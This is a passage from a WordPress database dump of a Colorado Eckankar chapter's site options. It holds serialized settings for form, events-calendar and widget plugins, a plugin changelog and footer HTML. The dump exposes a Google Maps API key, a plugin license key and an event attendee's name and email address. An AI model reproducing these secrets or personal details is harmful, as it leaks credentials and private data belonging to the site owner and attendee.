Styles!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/layouts-and-styles\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Layout+and+Styles\",\"plugin\":\"ninja-forms-style\\/ninja-forms-style.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/layouts-and-styles\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Layout+and+Styles+Docs\",\"version\":\"3.0.29\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Basic 2022\",\"slug\":\"basic-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Stripe\",\"image\":\"assets\\/img\\/add-ons\\/stripe.png\",\"content\":\"Use Stripe Checkout forms to sell products or subscriptions. Accept credit cards, Google Pay, Apple Pay, & much more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/stripe\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Stripe\",\"plugin\":\"ninja-forms-stripe\\/ninja-forms-stripe.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/stripe\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Stripe+Docs\",\"version\":\"3.2.6\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Accept Payments\",\"slug\":\"accept-payments\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Conditional Logic\",\"image\":\"assets\\/img\\/add-ons\\/conditional-logic.png\",\"content\":\"Create forms that change as they\'re filled out. Show and hide fields, modify lists, send email to different recipients conditionally and much more.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/conditional-logic\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Conditional+Logic\",\"plugin\":\"ninja-forms-conditionals\\/conditionals.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/conditional-logic\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Conditional+Logic+Docs\",\"version\":\"3.1\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Basic 2022\",\"slug\":\"basic-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"PDF Form Submission\",\"image\":\"assets\\/img\\/add-ons\\/pdf-form-submission.png\",\"content\":\"Use PDF Form Submission to generate a PDF from any WordPress form submission. Create a fully customizable, fillable PDF from top to bottom!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/pdf\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PDF+Form+Submission\",\"plugin\":\"ninja-forms-pdf-submissions\\/nf-pdf-submissions.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/pdf\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PDF+Form+Submission+Docs\",\"version\":\"3.2.2\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Elite Membership\",\"image\":\"assets\\/img\\/add-ons\\/elite-membership-2.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elite+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elite+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"}]},{\"title\":\"Pro Membership\",\"image\":\"assets\\/img\\/add-ons\\/pro-membership-2.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pro+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pro+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"}]},{\"title\":\"Plus Membership\",\"image\":\"assets\\/img\\/add-ons\\/plus-membership-2.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Plus+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Plus+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"}]},{\"title\":\"PayPal\",\"image\":\"assets\\/img\\/add-ons\\/paypal-checkout.png\",\"content\":\"Use PayPal Checkout to accept standard PayPal payments, PayPal credit, Pay Later, Venmo, & bank debit in WordPress!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/paypal-checkout\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PayPal\",\"plugin\":\"ninja-forms-paypal\\/ninja-forms-paypal.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/paypal-checkout\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PayPal+Docs\",\"version\":\"3.0.2\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Accept Payments\",\"slug\":\"accept-payments\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]}]','no'),(7596078,'can_compress_scripts','0','yes'),(7596073,'wp_attachment_pages_enabled','1','yes'),(7596060,'wpcode_settings','a:10:{s:21:\"facebook_pixel_events\";a:5:{s:9:\"page_view\";i:1;s:11:\"add_to_cart\";i:1;s:12:\"view_content\";i:1;s:14:\"begin_checkout\";i:1;s:8:\"purchase\";i:1;}s:19:\"google_pixel_events\";a:6:{s:9:\"page_view\";i:1;s:11:\"add_to_cart\";i:1;s:9:\"view_item\";i:1;s:14:\"begin_checkout\";i:1;s:8:\"purchase\";i:1;s:10:\"conversion\";i:1;}s:22:\"pinterest_pixel_events\";a:4:{s:17:\"pagevisit_product\";i:1;s:14:\"begin_checkout\";i:1;s:11:\"add_to_cart\";i:1;s:8:\"purchase\";i:1;}s:19:\"tiktok_pixel_events\";a:4:{s:12:\"view_content\";i:1;s:11:\"add_to_cart\";i:1;s:14:\"begin_checkout\";i:1;s:8:\"purchase\";i:1;}s:20:\"headers_footers_mode\";b:0;s:18:\"editor_height_auto\";b:0;s:13:\"editor_height\";i:300;s:13:\"error_logging\";b:0;s:14:\"usage_tracking\";b:0;s:14:\"admin_bar_info\";b:0;}','yes'),(7374684,'SNV66954','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"Paigeblake89@yahoo.com\";s:4:\"name\";s:11:\"Paige Blake\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1683455400:1683502200\";s:8:\"event_id\";s:6:\"268430\";s:19:\"translated_event_id\";s:6:\"268430\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268431;s:11:\"invoice_key\";s:32:\"7c3df90947406e25d2f4d191feb3b16a\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"Paigeblake89@yahoo.com\";s:4:\"name\";s:11:\"Paige Blake\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(16692,'nf_email_send_count','1','yes'),(16693,'nf_email_with_attachment_count','0','yes'),(16694,'nf_email_to_count','1','yes'),(16695,'nf_email_to_max','1','yes'),(16696,'nf_email_cc_count','0','yes'),(16697,'nf_email_cc_max','0','yes'),(16698,'nf_email_bcc_count','0','yes'),(16699,'nf_email_bcc_max','0','yes'),(16700,'nf_email_recipient_max','1','yes'),(16701,'nf_email_attachment_count','0','yes'),(16702,'nf_email_attachment_filesize_count','0','yes'),(16703,'nf_email_attachment_filesize_max','0','yes'),(16738,'nf_form_tel_data','1,26,25,24,23,27,28,22,30,31,29,21,20,19,32,18,17,16,15,14,33,34,13,12,11,10,9,8,6,5,4,2','no'),(16739,'ninja_forms_do_not_allow_tracking','1','yes'),(16906,'tribe_events_calendar_options','a:63:{s:14:\"schema-version\";s:3:\"3.9\";s:20:\"freemius_random_seed\";i:25;s:27:\"recurring_events_are_hidden\";s:7:\"exposed\";s:21:\"previous_ecp_versions\";a:29:{i:0;s:1:\"0\";i:1;s:5:\"4.9.4\";i:2;s:5:\"4.9.5\";i:3;s:5:\"4.9.6\";i:4;s:5:\"4.9.7\";i:5;s:5:\"4.9.8\";i:6;s:5:\"4.9.9\";i:7;s:6:\"4.9.12\";i:8;s:6:\"4.9.13\";i:9;s:6:\"4.9.14\";i:10;s:7:\"5.0.0.1\";i:11;s:7:\"5.0.0.2\";i:12;s:5:\"5.0.1\";i:13;s:5:\"5.0.2\";i:14;s:7:\"5.0.2.1\";i:15;s:5:\"5.0.3\";i:16;s:7:\"5.0.3.1\";i:17;s:5:\"5.1.0\";i:18;s:5:\"5.1.1\";i:19;s:5:\"5.1.2\";i:20;s:7:\"5.1.2.1\";i:21;s:5:\"5.1.4\";i:22;s:5:\"5.1.5\";i:23;s:5:\"5.1.6\";i:24;s:5:\"5.2.0\";i:25;s:5:\"5.2.1\";i:26;s:7:\"5.2.1.1\";i:27;s:5:\"5.3.0\";i:28;s:5:\"5.3.1\";}s:18:\"latest_ecp_version\";s:7:\"5.3.1.1\";s:39:\"last-update-message-the-events-calendar\";s:5:\"4.9.5\";s:16:\"tribeEnableViews\";a:6:{i:0;s:4:\"list\";i:1;s:5:\"month\";i:2;s:4:\"week\";i:3;s:3:\"day\";i:4;s:3:\"map\";i:5;s:5:\"photo\";}s:18:\"pro-schema-version\";s:7:\"5.2.1.2\";s:13:\"earliest_date\";s:19:\"2019-08-11 10:30:00\";s:21:\"earliest_date_markers\";a:1:{i:0;s:5:\"52324\";}s:11:\"latest_date\";s:19:\"2022-02-06 12:00:00\";s:19:\"latest_date_markers\";a:1:{i:0;s:6:\"263379\";}s:16:\"stylesheetOption\";s:5:\"tribe\";s:19:\"tribeEventsTemplate\";s:7:\"default\";s:10:\"viewOption\";s:5:\"month\";s:19:\"mobile_default_view\";s:7:\"default\";s:20:\"tribeDisableTribeBar\";b:1;s:18:\"hideLocationSearch\";b:1;s:17:\"hideRelatedEvents\";b:1;s:23:\"week_view_hide_weekends\";b:0;s:16:\"monthEventAmount\";s:1:\"6\";s:23:\"enable_month_view_cache\";b:1;s:18:\"dateWithYearFormat\";s:6:\"F j, Y\";s:21:\"dateWithoutYearFormat\";s:3:\"F j\";s:18:\"monthAndYearFormat\";s:3:\"F Y\";s:13:\"weekDayFormat\";s:4:\"D jS\";s:17:\"dateTimeSeparator\";s:3:\" @ \";s:18:\"timeRangeSeparator\";s:3:\" - \";s:16:\"datepickerFormat\";s:1:\"0\";s:30:\"tribeEventsShortcodeBeforeHTML\";b:0;s:21:\"tribeEventsBeforeHTML\";s:0:\"\";s:29:\"tribeEventsShortcodeAfterHTML\";b:0;s:20:\"tribeEventsAfterHTML\";s:0:\"\";s:11:\"donate-link\";b:0;s:12:\"postsPerPage\";s:2:\"10\";s:17:\"liveFiltersUpdate\";b:0;s:32:\"hideSubsequentRecurrencesDefault\";b:0;s:31:\"userToggleSubsequentRecurrences\";b:0;s:25:\"recurrenceMaxMonthsBefore\";s:1:\"6\";s:24:\"recurrenceMaxMonthsAfter\";s:2:\"24\";s:20:\"toggle_blocks_editor\";b:0;s:33:\"toggle_blocks_editor_hidden_field\";b:0;s:12:\"showComments\";b:0;s:29:\"disable_metabox_custom_fields\";b:1;s:20:\"showEventsInMainLoop\";b:0;s:10:\"eventsSlug\";s:6:\"events\";s:15:\"singleEventSlug\";s:5:\"event\";s:14:\"multiDayCutoff\";s:5:\"00:00\";s:21:\"defaultCurrencySymbol\";s:1:\"$\";s:23:\"reverseCurrencyPosition\";b:0;s:17:\"trash-past-events\";s:0:\"\";s:18:\"delete-past-events\";s:0:\"\";s:15:\"embedGoogleMaps\";b:1;s:23:\"geoloc_default_geofence\";s:2:\"25\";s:19:\"geoloc_default_unit\";s:5:\"miles\";s:19:\"embedGoogleMapsZoom\";s:2:\"10\";s:11:\"debugEvents\";b:0;s:26:\"tribe_events_timezone_mode\";s:5:\"event\";s:32:\"tribe_events_timezones_show_zone\";b:0;s:24:\"front_page_event_archive\";b:0;s:22:\"google_maps_js_api_key\";s:39:\"AIzaSyDNsicAsP6-VuGtAb1O9riI3oc_NOb7IOU\";s:16:\"views_v2_enabled\";b:0;s:8:\"did_init\";b:1;}','yes'),(16907,'widget_tribe-events-list-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16908,'tribe_last_save_post','1620677256.1188','yes'),(16909,'tribe_last_generate_rewrite_rules','1620614098.4126','yes'),(16938,'widget_tribe-events-adv-list-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16939,'widget_tribe-events-countdown-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16940,'widget_tribe-mini-calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16941,'widget_tribe-events-venue-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16942,'widget_tribe-this-week-events-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16958,'pue_install_key_events_calendar_pro','9ad23ddb671afa4dd0143511ba9aafd6e038df73','yes'),(16959,'tribe_pue_key_notices','a:0:{}','yes'),(16964,'pue_install_key_promoter','','yes'),(16965,'pue_install_key_event_aggregator','','yes'),(16966,'external_updates-events-calendar-pro','O:8:\"stdClass\":3:{s:9:\"lastCheck\";i:1620677256;s:14:\"checkedVersion\";s:5:\"5.2.1\";s:6:\"update\";O:19:\"Tribe__PUE__Utility\":11:{s:2:\"id\";i:0;s:6:\"plugin\";s:43:\"events-calendar-pro/events-calendar-pro.php\";s:4:\"slug\";s:19:\"events-calendar-pro\";s:7:\"version\";s:5:\"5.6.0\";s:8:\"homepage\";s:18:\"http://m.tri.be/4d\";s:12:\"download_url\";s:308:\"https://pue.theeventscalendar.com/api/plugins/v2/download?plugin=events-calendar-pro&version=5.6.0&installed_version=5.2.1&domain=eckankar-colorado.org&multisite=0&network_activated=0&active_sites=1&wp_version=5.7.1&key=9ad23ddb671afa4dd0143511ba9aafd6e038df73&dk=9ad23ddb671afa4dd0143511ba9aafd6e038df73&o=m\";s:8:\"sections\";O:8:\"stdClass\":3:{s:11:\"description\";s:220:\"Events Calendar PRO is an extension to Modern Tribe\'s The Events Calendar, and includes recurring events, additional frontend views and more. To see a full feature list please visit the product page (http://m.tri.be/4d).\";s:12:\"installation\";s:353:\"Installing Events Calendar PRO is easy: just back up your site, download/install The Events Calendar from the WordPress.org repo, and download/install Events Calendar PRO from theeventscalendar.com. Activate them both and you\'ll be good to go! If you\'re still confused or encounter problems, check out part 1 of our new user primer (http://m.tri.be/4i).\";s:9:\"changelog\";s:3338:\"<p>= [5.6.0] 2021-04-29 =</p>\r\n\r\n<ul>\r\n<li>Version - Events Calendar PRO 5.6.0 is only compatible with The Events Calendar 5.6.0 and higher.</li>\r\n<li>Feature - Update the Events Calendar widget with a new template and styles. [ECP-531]</li>\r\n<li>Feature - Update the Events by Week widget with a new template and styles. [ECP-532]</li>\r\n<li>Fix - Widgets will properly expire caching for Week and Month view usage [ECP-826] [ECP-824]</li>\r\n<li>Fix - Ensure assets are enqueued when rendering cached views in shortcodes. [ECP-770]</li>\r\n<li>Fix - Switch widget and recurrence to using The Events Calendar Select2 to avoid conflicts with other plugins [TEC-3748]</li>\r\n<li>Fix - Elementor changes now propagate across all recurring events and retain formatting. [ECP-469]</li>\r\n<li>Fix - Shortcode styles now properly load when using Twenty Seventeen theme. [ECP-816]</li>\r\n<li>Fix - Improve escaping for messages when no results were found using search (Thanks Steve Pollak)</li>\r\n<li>Tweak - Added filters: <code>tribe_events_meta_copier_copy_meta_value</code>, <code>tribe_customizer_should_print_shortcode_customizer_styles</code>, <code>tribe_events_views_v2_week_events_per_day</code>, <code>tribe_events_pro_views_v2_widgets_compatibility_id_migration_map</code>, <code>tribe_events_pro_events_by_week_widget_hide_weekends</code>, <code>tribe_events_pro_events_by_week_widget_title_date_format</code></li>\r\n<li>Tweak - Removed filters: <code>tribe_events_pro_shortcode_compatibility_required</code></li>\r\n<li>Tweak - Added actions: <code>tribe_events_pro_shortcode_month_widget_add_hooks</code>, <code>tribe_events_pro_shortcode_month_widget_remove_hooks</code></li>\r\n<li>Tweak - Changed views: <code>pro/week/single-event</code>, <code>v2/map</code>, <code>v2/week</code>, <code>v2/week/grid-body</code>, <code>v2/week/grid-body/events-day</code>, <code>v2/week/grid-body/events-day/more-events</code>, <code>v2/week/grid-body/multiday-events-day/more-events</code>, <code>v2/week/mobile-events/day</code>, <code>v2/week/mobile-events/day/more-events</code>, <code>v2/widgets/shortcodes/components/after</code>, <code>v2/widgets/shortcodes/components/before</code>, <code>v2/widgets/shortcodes/components/icons/caret-left</code>, <code>v2/widgets/shortcodes/components/icons/caret-right</code>, <code>v2/widgets/shortcodes/components/top-bar</code>, <code>v2/widgets/shortcodes/components/top-bar/nav</code>, <code>v2/widgets/shortcodes/components/top-bar/nav/next-disabled</code>, <code>v2/widgets/shortcodes/components/top-bar/nav/next</code>, <code>v2/widgets/shortcodes/components/top-bar/nav/prev-disabled</code>, <code>v2/widgets/shortcodes/components/top-bar/nav/prev</code>, <code>v2/widgets/shortcodes/components/top-bar/week-nav</code>, <code>v2/widgets/shortcodes/components/view-more</code>, <code>v2/widgets/shortcodes/components/week-top-bar</code>, <code>v2/widgets/shortcodes/events-month</code>, <code>v2/widgets/shortcodes/events-week</code>, <code>v2/widgets/widget-countdown/complete</code>, <code>v2/widgets/widget-countdown/widget-title</code>, <code>v2/widgets/widget-events-list/event/cost</code>, <code>v2/widgets/widget-events-list/event/organizers</code>, <code>v2/widgets/widget-events-list/event/venue</code></li>\r\n<li>Language - 12 new strings added, 99 updated, 7 fuzzied, and 6 obsoleted</li>\r\n</ul>\";}s:14:\"upgrade_notice\";s:0:\"\";s:13:\"custom_update\";O:8:\"stdClass\":1:{s:5:\"icons\";O:8:\"stdClass\":1:{s:3:\"svg\";s:84:\"https://theeventscalendar.com/content/themes/tribe-ecp/img/svg/product-icons/ECP.svg\";}}s:11:\"api_expired\";b:0;s:11:\"api_upgrade\";b:0;}}','no'),(23668,'widget_widget_accordions','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(23736,'wpsm_acc_r_review','a:2:{s:4:\"time\";i:1565118083;s:9:\"dismissed\";b:1;}','yes'),(23786,'tadv_settings','a:10:{s:9:\"toolbar_1\";s:106:\"formatselect,bold,italic,blockquote,bullist,numlist,alignleft,aligncenter,alignright,link,unlink,undo,redo\";s:9:\"toolbar_2\";s:103:\"fontselect,fontsizeselect,outdent,indent,pastetext,removeformat,charmap,wp_more,forecolor,table,wp_help\";s:9:\"toolbar_3\";s:0:\"\";s:9:\"toolbar_4\";s:0:\"\";s:21:\"toolbar_classic_block\";s:123:\"formatselect,bold,italic,blockquote,bullist,numlist,alignleft,aligncenter,alignright,link,forecolor,backcolor,table,wp_help\";s:13:\"toolbar_block\";s:10:\"core/image\";s:18:\"toolbar_block_side\";s:88:\"core/superscript,core/subscript,core/strikethrough,core/code,tadv/mark,tadv/removeformat\";s:12:\"panels_block\";s:44:\"tadv/color-panel,tadv/background-color-panel\";s:7:\"options\";s:44:\"menubar_block,menubar,merge_toolbars,advlist\";s:7:\"plugins\";s:13:\"table,advlist\";}','yes'),(23787,'tadv_admin_settings','a:2:{s:7:\"options\";s:95:\"classic_paragraph_block,no_autop,table_resize_bars,table_grid,table_tab_navigation,table_advtab\";s:16:\"disabled_editors\";s:0:\"\";}','yes'),(23788,'tadv_version','5900','yes'),(24686,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(25808,'widget_sow-button','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25809,'widget_sow-google-map','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25810,'widget_sow-image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25811,'widget_sow-slider','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25812,'widget_sow-post-carousel','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25813,'widget_sow-editor','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25814,'siteorigin_widget_bundle_version','1.15.7','yes'),(25815,'siteorigin_widgets_old_widgets','/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/accordion/accordion.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/button/button.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/cta/cta.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/contact/contact.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/editor/editor.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/features/features.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/google-map/google-map.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/headline/headline.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/hero/hero.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/icon/icon.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/image/image.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/image-grid/image-grid.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/slider/slider.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/layout-slider/layout-slider.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/post-carousel/post-carousel.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/price-table/price-table.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/simple-masonry/simple-masonry.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/social-media-buttons/social-media-buttons.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/tabs/tabs.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/taxonomy/taxonomy.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/testimonial/testimonial.php,/home/eckank5/eckankar-colorado.org/wp-content/plugins/so-widgets-bundle/widgets/video/video.php','yes'),(25818,'siteorigin_widgets_active','a:7:{s:6:\"button\";b:1;s:10:\"google-map\";b:1;s:5:\"image\";b:1;s:6:\"slider\";b:1;s:13:\"post-carousel\";b:1;s:6:\"editor\";b:1;s:9:\"accordion\";b:1;}','yes'),(25819,'widget_sow-accordion','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(25843,'sp_eap_settings','a:3:{s:15:\"eap_data_remove\";b:0;s:18:\"eap_dequeue_fa_css\";b:1;s:13:\"ea_custom_css\";s:0:\"\";}','yes'),(26502,'_tribe_geoloc_fixed','1','yes'),(32158,'widget_textblockswidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(32393,'ihaf_insert_header','','yes'),(32394,'ihaf_insert_footer','<div class=\\\"boldgrid-section\\\" style=\\\"background-color: #1d5791;\\\">\r\n<div class=\\\"container\\\">\r\n<div class=\\\"row\\\" style=\\\"padding-top: 50px; padding-bottom: 10px;\\\">\r\n<div class=\\\"col-md-4 col-sm-6 col-xs-12 col-lg-4\\\">\r\n<p class=\\\"\\\" style=\\\"width: auto; margin-bottom: 30px;\\\"><img class=\\\"alignleft wp-image-28477 size-full\\\" src=\\\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/03/footer-9-3-16-23.png\\\" alt=\\\"Eckankar In Colorado\\\" width=\\\"274\\\" height=\\\"52\\\"></p>\r\n<p class=\\\"\\\"> </p>\r\n<p class=\\\"\\\" style=\\\"color: #c0c0c0; text-align: left; font-family: \\\'Montserrat\\\'; font-weight: 500; font-size: 14px;\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"500\\\" data-font-style=\\\"\\\">Presented by Colorado Satsang Society,<br>\r\nA Chartered Affiliate of Eckankar.</p>\r\n</div>\r\n<div class=\\\"col-md-3 col-sm-3 col-xs-12 col-lg-3\\\">\r\n<h4 class=\\\"\\\" style=\\\"color: #c0c0c0; text-align: left; border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 600; font-size: 18px; text-transform: none;\\\" data-font-family=\\\"Montserrat\\\" data-font-weight=\\\"600\\\" data-font-style=\\\"\\\">Explore</h4>\r\n<p class=\\\"\\\" style=\\\"color: #c0c0c0; text-align: left; border-width: 0px; font-family: \\\'Montserrat\\\'; font-weight: 400;\\\" data-font-family=\\\"Montserrat\\\" 